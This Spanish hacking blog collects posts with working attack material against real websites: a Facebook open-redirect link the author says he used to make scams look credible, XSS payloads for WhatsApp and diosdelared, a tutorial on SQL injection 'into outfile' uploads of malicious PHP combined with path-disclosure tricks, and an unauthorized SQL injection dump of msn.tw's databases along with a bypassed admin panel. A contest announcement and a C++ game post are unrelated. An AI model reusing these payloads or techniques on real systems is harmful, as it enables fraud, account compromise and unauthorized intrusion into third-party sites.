¡GANA ENTRADAS AL #CPCO7!

Tecleado por Maztor On 14:46 0 comentarios
 
Campus Party Colombia 2014 te invita a que hagas parte desde ya de esta 7ma edición, envíanos un video  donde nos cuentes  que es lo que más te gusta y te ha gustado de los anteriores Campus Party,  subirlo a Youtube o Instagram y enviarnos el link a las publicaciones en nuestra cuenta en Facebook (facebook.com/campuspartycolombia)  relacionadas con la actividad o mencionándonos en una tweet a nuestra cuenta oficial @CampusPartyCo y podrás ser el ganador de una de las 5 entradas que estaremos sorteando entre los participantes.

Puedes revisar todos los términos y condiciones de esta actividad aquí--> http://bit.ly/1oQT95I
Hola, tanto tiempo sin postear nada, aqui les dejo el PoC de una linda vulnerabilidad encontrada en facebook.




===========================================================================
PoC (Proof of Concept)
===========================================================================
https://www.facebook.com/a.php?u=[URL]&eid=AQI3nLb-cbZLO4MEIfh8ch1JhGnK95p8_IR04kdY-3mie_ZpHM0EgQ62fojLdryJ9RiB2i3qG47hKoVUEoy7K9yD5iNdrvPViUHFwR3outptCuv9zHT5VZPuWWbuLbNBCH_X037vLav_ZXfQ9K_3YgIS3QfVjGcCHobTc8nkO8z7ZXUBgjO7mlCDg5D8ulgMsGaWX-5D2qYVnfbZpUTYAQZHsA48V6Ci-NSCq-el6lxezy6l_PXNvcCFRFxmIDkEj-5sPdg4petYpy7rLEdv_wxOEEhpdH0_c4uIbVXaZpByEkXIoYifOWFo19DXABgAEIZQUbP_gUXpUN4UxT3DmUnu7nbyXMLRNkxh1mvja4VJq1hRqUZVJG14xU1CB7Y0pqS-myxu59LzRpnQevvwCMl6MZRezPFVi8d9fx5I1A2tWqUL66E6kp3HbHLFV-rumA-FJIvPYXqEaTxMbnwgVvTo0ih1ec3LHKhf7DlpWzeBTesI9RVoNRxu4EXnwcEllyiqoqakeyC7hhC3-fHbDjSm6nPqXjGyfw1rPBWbdwDjKk-5WRrvnnNKHu4rKoD56Jj8g0BTZcmknoHlRWIdL0zGtZl1Uoq_PFYE4gwhKa_RrWs6tPosdFqVwZ3rLmMGQlu1cApbhgsLsEfhVo34VsHsEE3XQq59eyh7d92DZZIUPJXU1T7mW_rB4mQPs8TLu_ZJpIseDG-bLivBCiINak87EAptqmPjD2Azt-4l0pj8xxh5-w2WbfB_cHcuO8qNfK4QYiPnBo6cY_UP-vCvQMIhcr_b0A09uZvndO1BaNZ5Wb6ZIgrsBQsceDfT_bNwzi0vNl4RTg28h4VwZIsbX6Jq-KAYLOGGlrLJfGiATDqEeu2K0bqDGM9b8LZa008grfYJUyPPEmy3EgTFiUnyTnHmti4jyaHpguEPHgPujo2pglYvsFMT4XGad0nE670cU6wVRBH4lzEOxYTCaeJm6vTod-fLpGjngQUSYRaMRa7JoX8zZWV2R--aoJrrO0rBgn3-qVTDsxQn8yHiVXmhxvVWrCz_X_LC3oeAhziVWyxaDINFXaYzYaSgqnFE01K3xpV3nQQPbmIIqCe77QWGBmcVgH11jKJqU3jSTRbaLw5tnEd6S2xPH7i-eLGOiT-h-sxTwkaykGSMUwBuovxHYrvcRCTZq7MyNagNNjAeKfiyCDBcIbyNKzZKAmWA2EAhn6fsfaFtNe2G1bbiFf9QhPl5fsDZ-39Uvtxy9olsbj6PuxGmOy65kjI2XhjEIurtvkTbOcuOE2T2ppjPdWku5m9E&__tn__=%2AB&sig=116958

En la variable "u" se indicara la URL a la cual deseas que se redirija el usuario final, a veces el sistema de seguridad no permite ciertas URL's, por lo tanto utiliza un archivo redireccionador que te ayude a saltarlo.

PD: He utilizado el bug con la simple intencion de darle veracidad a los scams.

Ejemplo: PoC in Action!


Bytes!

Whatsapp XSS Headers [USER-AGENT]

Tecleado por Maztor On 8:48 5 comentarios
Iniciando un nuevo dia, recuperandome un poco de mis bajas notas de la universidad... como habia comentado antes sobre mi tiempo de inactividad, hoy decidí divertirme un RATO para aprovechar esos 15 o 30 min sin nada que hacer... ¿Que mejor diversion que divagar en sitios buscando pequeños, basicos o avanzados XSS's ?

Pues bien no pasaron mas de 2:38 Min-Seg cuando ingrese a Whatsapp y note el lindo "detector" de USER-AGENT.

Pues como siempre tenemos ese instinto de "curiosidad" intentamos morir como le paso al pequeño gato curioso, en fin no somos gatos... Por experiencia conozco el tipico pensamiento mediocre de muchos programadores el cual consiste en dedicarle menos tiempo a lo "INTERNO" y que otros usuarios "no pueden ver"... Demasiado mediocre como descuidar Headers, Libs, filtros, etc; Nunca se sabe que tan rapido evoluvione un ataque y benificio XSS asi que segun mi opinion personal es mejor prevenir, aunque este no sea tan CRITICO y LETAL.


PoC 

Url Vulnearble: https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=%3CA%3E&me=%3CB%3E&u[]=%3CC%3E
--------------------------------------------------------------------------------------------------
Host: sro.whatsapp.net
User-Agent: [Vuln XSS Simple] <script>alert('@Mazt0r Was Here!')</script> 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
----------------------------------------------------------------------------------------------------

Result



Nota: una vulnerabilidad basica y sencilla pero se presta para mucha diversion. (Si entienden a lo que me refiero).

                                               [Verguenza usar Windows :( --- Pero No tengo PC al momento]

Saludos y Happy Hacking!


Picas y Fijas C++

Tecleado por Maztor On 19:04 1 comentarios
Esto me costo 1 dia y medio codearlo, no por lo dificil si no por que queria disfrutar lo divertido de este ejercicio, a la vez pudiendose compartir y que fuese facil su estudio o comprension para los que inician o estan activos en las presentes instrucciones.

En si ; el ejercicio esta realizado con instrucciones superbasicas para explotar al maximo la creatividad al ser aplicadas.

El codigo esta debidamente organizado y comentado para su posterior estudio.

////////////////////////////////////////////////////////////////////////////////////

// Titulo : Juego Picas y Fijas                                                   //

// Autor: MaztoR                                                                  //

// Blog : Maztor.blogspot.com || MaztoR [In]-Security                             //

// Twitter: @Mazt0r                                                               //
  
// Fecha de creacion: [04/Octubre/2012]                                           //

////////////////////////////////////////////////////////////////////////////////////


Ejecucion







------------------------------------------------------------------------------------------------------------------------
                                       Codigo en Pastebin: Link
                                       Codigo en Pastie: Link
                                       Codigo en Paste2: Link
                                       Codigo en Tinypaste: Link 
                                       Codigo en Safebin: Link
                                       Codigo en Codepad: Link
----------------------------------------------------------------------------------------------------------------------
Iniciando esta pequeña entrada, disculpen mi tiempo de inactividad; les voy a explicar por que se hacen tan necesarios e importantes los errores informativos, dependiendo del tipo de escenario.



De mi parte soy de los que les gusta la auditoria manual; y siempre busco enfocarme en identificar de critico-a-leve, con eso quiero decir que me gusta primero localizar las fallas mas graves del sistema y luego ir plasmando las leves... si, es algo ironico y muy estupido (NO USO UN ESTANDAR DE ANALISIS) pero como siempre digo.. lo improvisado es aun mas interesante y por el momento solo juego a crear mi estandar aleatorio; Cabe decir que no tengo quien me diga lo que tengo o no que hacer? (JEFE)   ;)

Bueno al realizar un reporte rapido (FLASH) de las fallas criticas, nos damos cuenta que a veces es muy necesario el trabajo en equipo, aunque la falla sea tan grave y de acceso brusco, puede apoyarse de un pilar para ser explotada. Con trabajo en equipo no me refiero a buscar a un bro que nos ayude... me refiero a usar varias fallas en conjunto para que una se apoye de la otra.

En que tecnicas o vulnerabilidades usamos fallas en conjunto?

En infinidad de escenarios, todo depende del tipo de acceso que se le quiera dar a la maquina, sin embargo; yo me enfocare en las mas usadas para que sea mejor interpretado el paper.


Upload Mysql

Esta tecnica se basa  en un comando de MYSQL el cual se apoya del permiso FILE asignado en los diversos usuarios [root] para que puedan ejecutar los comandos [Into outfile/*/ Load_file()], los cuales se ejecutaran por consultas arbirtrarias con la muy conocidad vuln [SQLI].


-----------------------------------------------------------------------------------------------------------------------------------




Para llevar a cabo el anterior metodo, es necesario el apoyo de informacion adicional, aqui es donde se afirma lo escrito anteriormente, en el cual necesitaremos el trabajo en conjuunto de fallas, que ayudaran a que se logre su objetivo final.

La informacion adicional necesaria para realizar el metodo de upload mysql  es la ruta raiz o DocumentRoot, que es la ruta desde la cual se es montado toda la estructura del sitio web segun la configuracion de su ADMIN. Esta es necesaria para poder subir archivos y dejarlos ejecutando en el servidor para el beneficio que requiera.

Ejemplo:

http://servidor/path1/archivo.php?sqli=-241 union all select 1,2,3,4,[CODEASUBIR],6,7,8,9 into outfile
"/home/usuario/web1/htdocs/path1/archivomalicioso.php"
 Resultado:

http://servidor/path1/archivomalicioso.php

 Si no sabemos esa ruta, no podriamos subir un archivo debido a que no estamos definiendo en donde sera su destino.


-------------------------------------------------------------------------------------

Directory Transversal

Esta vulnerabilidad se basa principalmente en obtencion archivos mediante rutas, aunque se puede explotar a ciegas jugando un poco al "reverse" [../../../] de directorios, pero si esta vulnerabilidad la apoyamos con un "error informativo" que nos de la Full Path Disclosure?... Seria mucho mas facil, incluso seria un poco mas peligroso y explicito, ya que podria navegar de raiz a rama [Metaforicamente]

Los errores que nos pueden ayudar son del tipo:



Pero la pregunta de todos seria... como logro saber la ruta completa?

Dependiendo del escenario armaremos el rompecabezas. Muchas veces al encontrar SQLI, el error impreso o generado tiende a ser un "Error informativo"; Ya que nos muestra FPD (Full path disclosure) entre otros datos que nos podrian servir para mas adelante.


Sin embargo no siemrpe es asi y hay es donde nos toca apoyarnos de otras fallas para lograr realizar el objetivo.


Este tipo de errores informativos los podemos localizar mediante google o algun crawler de preferencia, listando los archivos PHP del servidor indexados y ver sus errores.


Usando Dork basica:


site:sitio.com ext:php


Ejemplo:
  site:mensajito.tigo.com.co ext:php



Listo ya obtuvimos la path: /var/www/html/includes/common.inc.php
La explotacion seria masomenos asi:

Ejemplo:

http://servidor/path1/archivo.php?sqli=-241 union all select 1,2,3,4,[CODEASUBIR],6,7,8,9 into outfile
"/var/www/html/includes/archivomalicioso.php"
 Resultado:

http://servidor/includes/archivomalicioso.php

NOTA:  Tiende a ser necesario el Encode Base_64

Podemos enfrentarnos a un servidor mas seguro por lo tanto no indexa archivos php vuln y nos tocaria generarlos por nuestra propia cuenta.

La habitual forma para generar un full path disclosure seria jugar con las variables.
Tenemos un archivo que descarga los pdfs de la web mediante la variable ruta, la cual asigna donde se encuentran los PDF

Ejemplo:
www.sitio.com/descarga.php?ruta=/pdf/1.pdf

Rotundamente se descargara el pdf de forma bonita y sin ningun problema...Pero que pasa si ponemos una ruta invalida?

Ejemplo:
www.sitio.com/documentos/descarga.php?ruta=31337
www.sitio.com/documentos/descarga.php?ruta= 
www.sitio.com/documentos/descarga.php?ruta[]=

Resultado:

Warning: fopen(31337) [function.fopen]: failed to open stream: No such file or directory in /var/www/html/documentos/descarga.php on line 9

NOTA:  En ciertos casos no se generan errores con caracteres o rutas invalidas, por eso hay que probar sin poner nada: www.sitio.com/documentos/descarga.php?ruta=

Magicamento obtenemos ese lindo error el cual nos ayuda a proceder en la ayuda de otras vulnerabilidades.


Bueno, tambien podemos obtener y generar errores por cabeceras, de las cuales podemos usar un BLANK o carcater en parametros para ver como responde este.

En este caso utilizaré la muy conocida web del troyano poison-ivy la cual tiene un error al dejar en blank el parametro PHPSESSID= de Cookie.

GET http://www.poisonivy-rat.com/index.php?link=download HTTP/1.1
Host: www.poisonivy-rat.com
User-Agent: 
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID= 

Respuesta
HTTP/1.1 200 OK
Date: Sat, 30 Jun 2012 09:15:35 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch7 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch7
Content-Length: 7502
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

     


Aqui utilizaré el live HTTP headers (Disculpenme usar WindSucks [Mi PC esta Dañada])





 Si enviamos el BLANK obtendremos el siguiente error


Para la visualizacion quitamos las imagenes y bingo!


Nuestro Resultado seria:



Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/index.php on line 2

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /var/www/index.php:2) in /var/www/index.php on line 2

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /var/www/index.php:2) in /var/www/index.php on line 2
Quien dijo que era un simple error??? El Limite lo impones tu :)

XSS PHP_SELF en Diosdelared

Tecleado por Maztor On 17:44 3 comentarios
Bueno mi compañero "DEDALO" "SEGURIDADBLANCA" me comento al DM de TT sobre unos XSS aqui en DDLR, al ver estos noté que eran los mismos que yo habia encontrado en otras rutas, analizando muy bien su estructura se pudo decir.. es XSS en PHP_SELF.

Hablemos un poco de PHP_SELF.
Es una de las variables predefinidas de PHP ya OBSOLETA

El nombre de archivo del script ejecutándose actualmente, relativo a la raíz de documentos. Por ejemplo, $_SERVER['PHP_SELF'] en un script en la dirección http://example.com/test.php/foo.bar sería /test.php/foo.bar. La constante __FILE__ contiene la ruta completa y nombre del archivo actual (es decir, incluido).

Si PHP está siendo ejecutado como un procesador de línea de comandos, esta variable contiene el nombre del script a partir de PHP 4.3.0.

http://www.php-es.com/reserved.variables.html

Esta variable es muy usada.. y muy insegura, comunmente utilizada para apuntar los formularios hacia la misma página.

=====================
Ejemplo:
=====================


   <form action="<?=$PHP_SELF?>">
   <input type="hidden" name="submitted" value="1" />
   <input type="submit" value="Submit!" />
  </form>
 </body>
</html>


===================
Explotacion
===================

/usandophpself.php/">[JS MALICIOUS CODE]

=================
Resultado
=================

<form action="/raiz/usandophpself.php/"><script>alert('XSS PHP_SELF')</script><foo">
   <input type="hidden" name="submitted" value="1" />
   <input type="submit" value="Submit!" />
  </form>
 </body>
</html>

========================
Posible Fix
========================

$_SERVER['SCRIPT_NAME']

Hace Referencia tambien a: $_SERVER['PHP_SELF']

========================================

Archivos [RUTAS] Vulnerables
========================================

    www.diosdelared.com/home/register.php/"><script>alert('XSS');</script> 
    www.diosdelared.com/home/login.php/"><script>alert('XSS');</script>
    www.diosdelared.com/foro/index.php/"><script>alert('XSS');</script>
    www.diosdelared.com/home/index.php/"><script>alert('XSS');</script>
    www.diosdelared.com/blogs/admin.php/"><script>alert('XSS');</script>
    www.diosdelared.com/torneos.php/"><script>alert('XSS');</script>
    www.diosdelared.com/ayuda.php/"><script>alert('XSS');</script>

================================================
Creditos 3 Dedalo - 4 MaztoR
================================================


Los bugs han sido Reportados a MurdeR y parchados!

/* RETO "Encuentra un XSS en DDLR" */ CRASH WIN!

MSN Taiwan [SQLI , BYPASS y XSS]

Tecleado por Maztor On 23:58 8 comentarios
Bueno, por hay con un bro de ddlr nos pusimos a intentar el ingreso a MSN.TW de la cual es ironico que tenga un directorio tan mugre y a la vez usando PHP y MYSQL , sin embargo decidimos explorar mas debido a que es muy llamativo todo este escenario.
Msn.tw

Iniciamos asi:
http://www.msn.tw/softball/gamedetail.php?gameseq=218+and+1=0+union+select+version%28%29,1,2,3,4,5,6,7,8,9,10,11--

De hay comenzamos a sacar la data...
Info basica

Apache
PHP/5.2.13
PleskLin
MySQL >=5
5.0.90

Dbs's:

information_schema
msn
test

Db Principal:

accesslog
album
board
forum
game
lotto_539
mem
open_account
open_article
open_article_content
open_article_content_d
open_board
open_collect
open_keyword
open_tracking
open_violate
photo
record
record_2005
record_2006
record_2007
record_2009
record_2010
record_2011
record_2012
redir_conf
reserve
static
static_2005
static_2006
static_2007
static_2009
static_2010
static_2011
static_2012
team
user
webcont
-----------------------------------------------------------------------------------
Despues de realizar todo esto dieron ganas de subir shell, pero no logre el objetivo, intente en paneles loguearme y logre pero nada interesante aunqu cabe aclarar que no era necesario sacar user debido a que el panel tenia bypasse.. el Uploader no servia de mucho que digamos.
PANEL CON BYPASSE

Aburrido solo me puse a explotar XSS en el foro...
http://www.msn.tw/softball/forum.php

Apoyo ---------------------------------
Black-Mantic Blaron , 5TU4RT
Related Posts Plugin for WordPress, Blogger...
Sigueme en Twitter

Qr-c0de Url Blog

Suscribirse al blog

Ingresar Email

¡Recomendar! y RSS